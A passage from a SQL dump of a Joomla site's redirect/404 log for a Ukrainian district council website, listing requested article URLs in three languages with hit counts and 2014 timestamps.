00:00:00',301),(10224,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=en&Itemid=','','','',3,0,'2014-11-06 10:24:13','0000-00-00 00:00:00',301),(10225,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=ru','','','',1,0,'2014-11-06 10:24:17','0000-00-00 00:00:00',301),(10226,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 10:24:20','0000-00-00 00:00:00',301),(10227,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=ru','','','',2,0,'2014-11-06 10:24:34','0000-00-00 00:00:00',301),(10228,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-06 10:24:37','0000-00-00 00:00:00',301),(10229,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 10:25:20','0000-00-00 00:00:00',301),(10230,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-06 10:25:24','0000-00-00 00:00:00',301),(10231,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1048:2013-07-10-05-53-06&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-06 10:25:47','0000-00-00 00:00:00',301),(10232,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1048:2013-07-10-05-53-06&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-06 10:25:51','0000-00-00 00:00:00',301),(10233,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1048:2013-07-10-05-53-06&catid=51&Itemid=92&lang=uk','','','',2,0,'2014-11-06 10:25:57','0000-00-00 00:00:00',301),(10234,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 10:26:12','0000-00-00 00:00:00',301),(10235,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=ru','','','',1,0,'2014-11-06 10:27:22','0000-00-00 00:00:00',301),(10236,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 10:27:26','0000-00-00 00:00:00',301),(10237,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=en','','','',1,0,'2014-11-06 10:27:32','0000-00-00 00:00:00',301),(10238,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 10:27:43','0000-00-00 00:00:00',301),(10239,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 10:27:46','0000-00-00 00:00:00',301),(10240,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1058:-2013-&catid=51&Itemid=92&lang=ru','','','',11,0,'2014-11-06 10:27:52','0000-00-00 00:00:00',301),(10241,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:----------2013-2015-&catid=36&Itemid=70&lang=en','','','',6,0,'2014-11-06 10:28:05','0000-00-00 00:00:00',301),(10242,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=ru','','','',1,0,'2014-11-06 10:28:05','0000-00-00 00:00:00',301),(10243,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 10:28:09','0000-00-00 00:00:00',301),(10244,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 10:28:29','0000-00-00 00:00:00',301),(10245,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 10:28:34','0000-00-00 00:00:00',301),(10246,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=en','','','',1,0,'2014-11-06 10:28:42','0000-00-00 00:00:00',301),(10247,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 10:28:51','0000-00-00 00:00:00',301),(10248,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=en','','','',1,0,'2014-11-06 10:29:07','0000-00-00 00:00:00',301),(10249,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=en','','','',1,0,'2014-11-06 10:29:24','0000-00-00 00:00:00',301),(10250,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-06 10:29:32','0000-00-00 00:00:00',301),(10251,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 10:29:47','0000-00-00 00:00:00',301),(10252,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:--------&Itemid=0&lang=en','','','',1,0,'2014-11-06 10:30:09','0000-00-00 00:00:00',301),(10253,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:--------&Itemid=0&lang=ru','','','',1,0,'2014-11-06 10:30:13','0000-00-00 00:00:00',301),(10254,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:--------&Itemid=0&lang=uk','','','',1,0,'2014-11-06 10:30:15','0000-00-00 00:00:00',301),(10255,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=en','','','',1,0,'2014-11-06 10:30:20','0000-00-00 00:00:00',301),(10256,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&lang=ru&Itemid=','','','',5,0,'2014-11-06 10:30:30','0000-00-00 00:00:00',301),(10257,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 10:30:45','0000-00-00 00:00:00',301),(10258,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 10:30:48','0000-00-00 00:00:00',301),(10259,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 10:31:01','0000-00-00 00:00:00',301),(10260,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=ru','','','',2,0,'2014-11-06 10:31:03','0000-00-00 00:00:00',301),(10261,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 10:31:06','0000-00-00 00:00:00',301),(10262,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 10:31:09','0000-00-00 00:00:00',301),(10263,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 10:31:13','0000-00-00 00:00:00',301),(10264,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=ru','','','',1,0,'2014-11-06 10:31:16','0000-00-00 00:00:00',301),(10265,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 10:31:20','0000-00-00 00:00:00',301),(10266,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 10:31:23','0000-00-00 00:00:00',301),(10267,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 10:31:59','0000-00-00 00:00:00',301),(10268,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-11-06 10:32:01','0000-00-00 00:00:00',301),(10269,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&lang=uk','','','',2,0,'2014-11-06 10:32:29','0000-00-00 00:00:00',301),(10270,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11&lang=en','','','',2,0,'2014-11-06 10:32:40','0000-00-00 00:00:00',301),(10271,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=ru','','','',3,0,'2014-11-06 10:32:48','0000-00-00 00:00:00',301),(10272,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 10:33:04','0000-00-00 00:00:00',301),(10273,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 10:33:07','0000-00-00 00:00:00',301),(10274,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 10:33:10','0000-00-00 00:00:00',301),(10275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 10:33:15','0000-00-00 00:00:00',301),(10276,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=ru','','','',1,0,'2014-11-06 10:33:48','0000-00-00 00:00:00',301),(10277,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=ru','','','',4,0,'2014-11-06 10:34:13','0000-00-00 00:00:00',301),(10278,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=en','','','',4,0,'2014-11-06 10:34:21','0000-00-00 00:00:00',301),(10279,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 10:34:30','0000-00-00 00:00:00',301),(10280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=ru','','','',1,0,'2014-11-06 10:34:35','0000-00-00 00:00:00',301),(10281,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 10:34:38','0000-00-00 00:00:00',301),(10282,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=ru','','','',2,0,'2014-11-06 10:34:40','0000-00-00 00:00:00',301),(10283,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=ru','','','',1,0,'2014-11-06 10:34:45','0000-00-00 00:00:00',301),(10284,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 10:34:50','0000-00-00 00:00:00',301),(10285,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 10:34:53','0000-00-00 00:00:00',301),(10286,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/505-pro-spisannja-avtomobilja','',18,0,'2014-11-06 11:03:28','0000-00-00 00:00:00',301),(10287,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47&Itemid=86&lang=ru','','','',7,0,'2014-11-06 12:36:37','0000-00-00 00:00:00',301),(10288,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47&Itemid=86&lang=ru','','','',2,0,'2014-11-06 12:36:46','0000-00-00 00:00:00',301),(10289,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=3:2010-06-05-12-50-56&layout=blog&Itemid=7&lang=ru','','','',5,0,'2014-11-06 12:37:23','0000-00-00 00:00:00',301),(10290,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=5:2010-06-05-12-51-34&layout=blog&Itemid=6&lang=ru','','','',4,0,'2014-11-06 12:37:42','0000-00-00 00:00:00',301),(10291,'http://www.malyn-rayrada.org.ua/tmp/a.php','','www.malyn-rayrada.org.ua/tmp/a.php','',2,0,'2014-11-06 13:15:13','0000-00-00 00:00:00',301),(10292,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=en','','','',1,0,'2014-11-06 13:42:40','0000-00-00 00:00:00',301),(10293,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=en&Itemid=','','','',9,0,'2014-11-06 13:42:42','0000-00-00 00:00:00',301),(10294,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=en','','','',1,0,'2014-11-06 13:43:06','0000-00-00 00:00:00',301),(10295,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 13:43:10','0000-00-00 00:00:00',301),(10296,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=ru','','','',2,0,'2014-11-06 13:43:13','0000-00-00 00:00:00',301),(10297,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 13:43:33','0000-00-00 00:00:00',301),(10298,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=ru','','','',1,0,'2014-11-06 13:43:39','0000-00-00 00:00:00',301),(10299,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-06 16:20:55','0000-00-00 00:00:00',301),(10300,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 17:08:02','0000-00-00 00:00:00',301),(10301,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 17:08:07','0000-00-00 00:00:00',301),(10302,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 17:08:13','0000-00-00 00:00:00',301),(10303,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 17:08:18','0000-00-00 00:00:00',301),(10304,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 17:08:24','0000-00-00 00:00:00',301),(10305,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 17:08:28','0000-00-00 00:00:00',301),(10306,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 17:08:34','0000-00-00 00:00:00',301),(10307,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=ru&Itemid=','','','',5,0,'2014-11-06 17:08:38','0000-00-00 00:00:00',301),(10308,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=uk&Itemid=','','','',6,0,'2014-11-06 17:08:43','0000-00-00 00:00:00',301),(10309,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 17:08:47','0000-00-00 00:00:00',301),(10310,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 17:09:24','0000-00-00 00:00:00',301),(10311,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 17:09:33','0000-00-00 00:00:00',301),(10312,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 17:09:38','0000-00-00 00:00:00',301),(10313,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-06 17:09:53','0000-00-00 00:00:00',301),(10314,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-06 17:09:57','0000-00-00 00:00:00',301),(10315,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=ru&Itemid=','','','',2,0,'2014-11-06 17:11:49','0000-00-00 00:00:00',301),(10316,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-06 17:11:58','0000-00-00 00:00:00',301),(10317,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 17:12:24','0000-00-00 00:00:00',301),(10318,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 17:12:30','0000-00-00 00:00:00',301),(10319,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=ru&Itemid=','','','',5,0,'2014-11-06 17:12:37','0000-00-00 00:00:00',301),(10320,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=uk&Itemid=','','','',2,0,'2014-11-06 17:12:43','0000-00-00 00:00:00',301),(10321,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-11-06 17:12:48','0000-00-00 00:00:00',301),(10322,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-11-06 17:12:53','0000-00-00 00:00:00',301),(10323,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-11-06 17:12:57','0000-00-00 00:00:00',301),(10324,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-11-06 17:13:01','0000-00-00 00:00:00',301),(10325,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-11-06 17:13:07','0000-00-00 00:00:00',301),(10326,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-11-06 17:13:12','0000-00-00 00:00:00',301),(10327,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-11-06 17:13:18','0000-00-00 00:00:00',301),(10328,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47&Itemid=86&lang=ru','','','',1,0,'2014-11-06 17:13:22','0000-00-00 00:00:00',301),(10329,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-11-06 17:14:01','0000-00-00 00:00:00',301),(10330,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-06 17:14:33','0000-00-00 00:00:00',301),(10331,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&lang=ru','','','',5,0,'2014-11-06 17:14:48','0000-00-00 00:00:00',301),(10332,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 17:16:34','0000-00-00 00:00:00',301),(10333,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 17:16:44','0000-00-00 00:00:00',301),(10334,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 17:17:00','0000-00-00 00:00:00',301),(10335,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 17:17:06','0000-00-00 00:00:00',301),(10336,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=en','','','',1,0,'2014-11-06 17:39:48','0000-00-00 00:00:00',301),(10337,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-11-06 17:42:37','0000-00-00 00:00:00',301),(10338,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1026:2013-06-14-05-02-34&catid=51&Itemid=92&lang=en','','','',1,0,'2014-11-06 18:39:52','0000-00-00 00:00:00',301),(10339,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1026:2013-06-14-05-02-34&catid=51&Itemid=92&lang=ru','','','',1,0,'2014-11-06 18:39:55','0000-00-00 00:00:00',301),(10340,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11&Itemid=14&lang=en','','','',1,0,'2014-11-06 19:03:10','0000-00-00 00:00:00',301),(10341,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-11-06 19:03:13','0000-00-00 00:00:00',301),(10342,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=840:-2007-2015-&catid=46&Itemid=85&lang=en','','','',1,0,'2014-11-06 19:06:32','0000-00-00 00:00:00',301),(10343,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 19:07:09','0000-00-00 00:00:00',301),(10344,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 19:07:18','0000-00-00 00:00:00',301),(10345,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=uk&Itemid=','','','',3,0,'2014-11-06 19:07:24','0000-00-00 00:00:00',301),(10346,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=en&Itemid=','','','',2,0,'2014-11-06 19:07:27','0000-00-00 00:00:00',301),(10347,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-06 19:07:30','0000-00-00 00:00:00',301),(10348,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 19:07:32','0000-00-00 00:00:00',301),(10349,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 19:07:41','0000-00-00 00:00:00',301),(10350,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 19:07:53','0000-00-00 00:00:00',301),(10351,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-06 19:08:11','0000-00-00 00:00:00',301),(10352,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-06 19:08:19','0000-00-00 00:00:00',301),(10353,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-06 19:08:23','0000-00-00 00:00:00',301),(10354,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 19:10:02','0000-00-00 00:00:00',301),(10355,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=en&Itemid=0','','','',6,0,'2014-11-06 19:10:09','0000-00-00 00:00:00',301),(10356,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-06 19:10:35','0000-00-00 00:00:00',301),(10357,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-06 19:10:38','0000-00-00 00:00:00',301),(10358,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-06 19:10:44','0000-00-00 00:00:00',301),(10359,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-06 19:10:54','0000-00-00 00:00:00',301),(10360,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=en&Itemid=0','','','',3,0,'2014-11-06 19:11:02','0000-00-00 00:00:00',301),(10361,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-11-06 19:11:23','0000-00-00 00:00:00',301),(10362,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=uk&Itemid=0','','','',6,0,'2014-11-06 19:11:27','0000-00-00 00:00:00',301),(10363,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-06 19:11:31','0000-00-00 00:00:00',301),(10364,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-06 19:11:52','0000-00-00 00:00:00',301),(10365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=ru&Itemid=','','','',3,0,'2014-11-06 19:12:20','0000-00-00 00:00:00',301),(10366,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-11-06 19:12:41','0000-00-00 